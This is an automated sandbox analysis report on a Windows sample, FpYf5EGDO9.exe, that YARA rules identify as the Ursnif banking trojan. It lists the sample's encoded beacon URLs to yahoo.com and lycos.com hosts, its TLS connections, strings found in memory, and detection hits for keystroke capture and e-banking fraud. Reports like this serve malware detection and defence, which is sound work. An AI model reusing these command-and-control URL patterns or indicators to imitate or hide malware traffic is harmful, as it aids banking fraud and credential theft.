Source: global traffic HTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
Source: global traffic HTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
Source: global traffic HTTP traffic detected: GET /images/ULsdPIVaor8tHILk/0ulmqbrH6ITnKv9/hjuxJRtL9AnqjM_2F9/31KQzlJ4A/RADn_2B9K7qN4OIWzhqt/e9pg3qo9NJvDplsJyu_/2BINJhitzziIxZ5FGe3dQs/qXLEJMLfrql94/pbynvtsD/hbcZQz4rDORcqa20GNWm_2B/AEaRjxdvZi/WJoDjLGRG7wMNfA10/47LdHNX1Ihp_/2F5oAPCKnfW/OXUd0uJQ9lRCE3/_2Bk_2BnDXgKUHje_2FRL/1haIbjYdfbhVAxGo/8KwtG_2Fq/c.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: mail.yahoo.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2FULsdPIVaor8tHILk%2F0ulmqbrH6ITnKv9%2FhjuxJRtL9AnqjM_2F9%2F31KQzlJ4A%2FRADn_2B9K7qN4OIWzhqt%2Fe9pg3qo9NJvDplsJyu_%2F2BINJhitzziIxZ5FGe3dQs%2FqXLEJMLfrql94%2FpbynvtsD%2FhbcZQz4rDORcqa20GNWm_2B%2FAEaRjxdvZi%2FWJoDjLGRG7wMNfA10%2F47LdHNX1Ihp_%2F2F5oAPCKnfW%2FOXUd0uJQ9lRCE3%2F_2Bk_2BnDXgKUHje_2FRL%2F1haIbjYdfbhVAxGo%2F8KwtG_2Fq%2Fc.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: login.yahoo.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 23 Nov 2021 19:59:01 GMTp3p: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"cache-control: privatex-content-type-options: nosniffcontent-type: text/html; charset=UTF-8x-envoy-upstream-service-time: 14server: ATSContent-Length: 1052Age: 1Connection: closeStrict-Transport-Security: max-age=31536000Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.com https://*.oath.com https://*.search.yahoo.com https://*.search.aol.com https://*.search.huffpost.com https://*.verizonmedia.com https://*.publishing.oath.com https://*.autoblog.com; sandbox allow-forms allow-same-origin allow-scripts allow-popups allow-popups-to-escape-sandbox allow-presentation; report-uri https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=8voena9gpqi06&partner=;X-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=block
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Nov 2021 20:01:39 GMTServer: ApacheContent-Security-Policy: frame-ancestors 'self' *.lycos.comX-Powered-By: PHP/7.2.24Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: *.www.yahoo.com equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: *.www.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: *.www.yahoo.comT equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: +www.yahoo.co equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: +www.yahoo.com equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351362297.0000000002289000.00000004.00000001.sdmp String found in binary or memory: <noscript><META http-equiv="refresh" content="0;URL='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fHHAQ457B0GtLskLkv%2fZizh9TthhcPc%2fxT0iS3Qjl7y%2fkpH0MqC4dszB3H%2fHWmjHuRTfALKqcqKHLe5h%2f5KAnfOS4i_2BLVi7%2f2L64u5xwvTf3sXp%2fUrLoeHhSH12GKB9jsQ%2f3izuuqgp_%2f2BeydbeuNgrndFBMAfCQ%2fMxSWsDqksAzA_2F87xp%2fN1In9Bv1C1YQS1KkwHJ10H%2fTNNv.crw'"></noscript> equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/ GlobalSign Root CA-R2 equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/ equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com// equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/R equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/[ equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/u equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351362297.0000000002289000.00000004.00000001.sdmp String found in binary or memory: s://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: s://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crwv/CCpK equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: s://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crwx equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fj equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fHHAQ457B0GtLskLkv%2fZizh9TthhcPc%2fxT0iS3Qjl7y%2fkpH0MqC4dszB3H%2fHWmjHuRTfALKqcqKHLe5h%2f5KAnfOS4i_2BLVi7%2f2L64u5xwvTf3sXp%2fUrLoeHhSH12GKB9jsQ%2f3izuuqgp_%2f2BeydbeuNgrndFBMAfCQ%2fMxSWsDqksAzA_2F87xp%2fN1In9Bv1C1YQS1KkwHJ10H%2fTNNv.crw'; equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.com7 equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.comB equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.comE equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.comZ equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.comows\system32\jsproxy.dll equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.comzD( equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.com{ equals www.yahoo.com (Yahoo)
Source: unknown HTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.3:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.3:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 89.44.9.140:443 -> 192.168.2.3:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49818 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.3:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 212.82.100.140:443 -> 192.168.2.3:49821 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: FpYf5EGDO9.exe, 00000000.00000002.510175221.00000000021AA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
